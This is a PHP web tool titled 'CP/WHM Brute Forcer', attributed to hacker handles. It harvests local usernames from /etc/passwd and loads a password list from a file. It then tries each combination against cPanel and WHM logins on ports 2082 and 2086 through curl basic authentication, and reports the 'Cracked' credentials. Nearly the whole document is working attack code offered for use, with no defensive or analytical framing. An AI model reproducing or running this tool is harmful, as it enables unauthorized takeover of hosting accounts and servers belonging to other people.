CP/WHM Brute Forcer By Xyb3r D3vil & 1337 H@x0r

1. <?php
2.  
3. $head = '
4. <html>
5. <head>
6. </script>
7. <title>CP/WHM Brute Forcer</title>
8.  
9. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
10.  
11. <STYLE>
12. body {
13. font-family: Tahoma
14. }
15. tr {
16. BORDER: dashed 1px #333;
17. color: #FFF;
18. }
19. td {
20. BORDER: dashed 1px #333;
21. color: #FFF;
22. }
23. .table1 {
24. BORDER: 0px Black;
25. BACKGROUND-COLOR: Black;
26. color: #FFF;
27. }
28. .td1 {
29. BORDER: 0px;
30. BORDER-COLOR: #333333;
31. font: 7pt Verdana;
32. color: Green;
33. }
34. .tr1 {
35. BORDER: 0px;
36. BORDER-COLOR: #333333;
37. color: #FFF;
38. }
39. table {
40. BORDER: dashed 1px #333;
41. BORDER-COLOR: #333333;
42. BACKGROUND-COLOR: Black;
43. color: #FFF;
44. }
45. input {
46. border : solid 3px ;
47. border-color : #333;
48. BACKGROUND-COLOR: white;
49. font: 11pt Verdana;
50. color: #333;
51. }
52. select {
53. BORDER-RIGHT: Black 1px solid;
54. BORDER-TOP: #DF0000 1px solid;
55. BORDER-LEFT: #DF0000 1px solid;
56. BORDER-BOTTOM: Black 1px solid;
57. BORDER-color: #FFF;
58. BACKGROUND-COLOR: Black;
59. font: 8pt Verdana;
60. color: Red;
61. }
62. submit {
63. BORDER: buttonhighlight 2px outset;
64. BACKGROUND-COLOR: Black;
65. width: 30%;
66. color: #FFF;
67. }
68. textarea {
69. border : dashed 1px #333;
70. BACKGROUND-COLOR: Black;
71. font: Fixedsys bold;
72. color: #999;
73. }
74. BODY {
75. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: White
76. margin: 1px;
77. color: white;
78. background-color: Black;
79. }
80. .main {
81. margin : -287px 0px 0px -490px;
82. BORDER: dashed 1px #333;
83. BORDER-COLOR: #333333;
84. }
85. .tt {
86. background-color: Black;
87. }
88.  
89. A:link {
90. COLOR: White; TEXT-DECORATION: none
91. }
92. A:visited {
93. COLOR: White; TEXT-DECORATION: none
94. }
95. A:hover {
96. color: white; TEXT-DECORATION: none
97. }
98. A:active {
99. color: white; TEXT-DECORATION: none
100. }
101. </STYLE>
102. <script language=\'javascript\'>
103. function hide_div(id)
104. {
105. document.getElementById(id).style.display = \'none\';
106. document.cookie=id+\'=0;\';
107. }
108. function show_div(id)
109. {
110. document.getElementById(id).style.display = \'block\';
111. document.cookie=id+\'=1;\';
112. }
113. function change_divst(id)
114. {
115. if (document.getElementById(id).style.display == \'none\')
116. show_div(id);
117. else
118. hide_div(id);
119. }
120. </script>'; ?>
121. <html>
122. <head>
123.  
124. <link rel="SHORTCUT ICON" type="image/x-icon"http://i.imgur.com/zDgvv6l.jpg"><center>
125. <a href="http://xyb3rd3vil-1337hax0r.blogspot.com/"> <img src="http://i.imgur.com/8fA7O8j.jpg" border="0"></center></a>
126.  
127. <h2><center>CP/WHM Brute Forcer</center></h2>
128. <?php
129. echo $head ;
130. echo '
131.  
132. <table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
133.  
134. </td></tr><tr><td
135. width="100%" align="center" valign="top" rowspan="1"><font
136. color="red" face="arial"size="1"><b>
137.  
138. ';
139.  
140. ?>
141. <form method=post>
142.  
143. <?php
144.  
145. //if(isset($_POST['cpanel']))
146. //{
147. ?>
148. <form method=post><div align=center><table>
149. Brute=><select name="op"> <option name="op" value="cp">CPanel</option>
150. <option name="op" value="whm">WHM</option></table><p>
151. <textarea style="background:black;color:white" rows=20 cols=25 name=usernames ><?php $users=file("/etc/passwd");
152. foreach($users as $user)
153. {
154. $str=explode(":",$user);
155. echo $str[0]."\n";
156. }
157.  
158. ?></textarea><textarea style="background:black;color:white" rows=20 cols=25 name=passwords >
159. <?php
160.  
161. $d=getcwd()."/BT.txt";
162. $pf=file($d);
163. foreach($pf as $rt)
164. {
165. $str=explode('\n',$rt);
166. echo trim($str[0])."\n";
167. } ?></textarea><p>
168. <input type=submit name=cpanelcracking value="Start"></form>
169. <?php
170. //}
171. ?>
172.  
173.  
174.  
175.  
176. <?php
177. error_reporting(0);
178. $connect_timeout=5;
179. set_time_limit(0);
180.  
181. $userl=$_POST['usernames'];
182. $passl=$_POST['passwords'];
183. $attack=$_POST['op'];
184. $target = "localhost";
185.  
186. if(isset($_POST['cpanelcracking']))
187. {
188. if($userl!=="" && $passl!=="")
189. {
190. if($_POST["op"]=="cp")
191. {
192. $cracked=$_POST['crack'];
193. @fopen($cracked,'a');
194. echo "Attacking CP....Wait till the end of process \n";
195.  
196.  
197. }
198. elseif($_POST["op"]=="whm")
199. {
200. @fopen($cracked,'a');
201. echo "Attacking WHM....Wait till the end of process";
202.  
203. }
204.  
205. function cpanel($host,$user,$pass,$timeout){
206. $ch = curl_init();
207. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
208. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
209. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
210. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
211. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
212. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
213. $data = curl_exec($ch);
214. if ( curl_errno($ch) == 0 ){
215. echo "<table width=100% ><tr><td align=center><b></font>
216.  
217. <font color=Green size=2> Cracked </font>
218.  
219. <font color=white size=2> Username is </font>
220.  
221. <font color=green size=2> $user</font>
222.  
223. <font color=white size=2> & </font>
224.  
225. <font color=green size=2> Password is </font>
226.  
227. <font color=white size=2> $pass </font>
228.  
229. </font></b></td></tr></table>";
230.  
231. }
232.  
233. curl_close($ch);}
234.  
235. $userlist=explode("\n",$userl);
236. $passlist=explode("\n",$passl);
237.  
238. if ($attack == "cp")
239. {
240. foreach ($userlist as $user) {
241. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
242. $finaluser = trim($user);
243. foreach ($passlist as $password ) {
244. $finalpass = trim($password);
245.  
246.  
247. cpanel($target,$finaluser,$finalpass,$connect_timeout);
248.  
249. }
250. }
251.  
252. }
253.  
254. function whm($host,$user,$pass,$timeout){
255. $ch = curl_init();
256. curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
257. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
258. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
259. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
260. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
261. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
262. $data = curl_exec($ch);
263. if ( curl_errno($ch) == 0 ){
264. echo "<table width=100% ><tr><td align=center><b></font>
265.  
266. <font color=red size=2> Cracked </font>
267.  
268. <font color=white size=2> Username is </font>
269.  
270. <font color=green size=2> $user</font>
271.  
272. <font color=red size=2> & </font>
273.  
274. <font color=white size=2> Password is </font>
275.  
276. <font color=green size=2> $pass </font>
277.  
278. </font></b></td></tr></table>";
279.  
280.  
281.  
282.  
283. }
284.  
285.  
286. curl_close($ch);}
287. $userlist=explode("\n",$userl);
288. $passlist=explode("\n",$passl);
289.  
290. if ($attack == "whm")
291. {
292. foreach ($userlist as $user) {
293. echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>user under attack is $user </font></td></tr></table>";
294. $finaluser = trim($user);
295. foreach ($passlist as $password ) {
296. $finalpass = trim($password);
297.  
298. whm($target,$finaluser,$finalpass,$connect_timeout);
299. }
300. }
301. }
302. }
303. elseif($userl=="")
304. {
305. echo "you have left userlist field empty";
306.  
307. }
308. elseif($passl=="")
309. {
310.  
311. echo "Put passwords in paasword list field (Required)";
312. }
313. }
314. ?>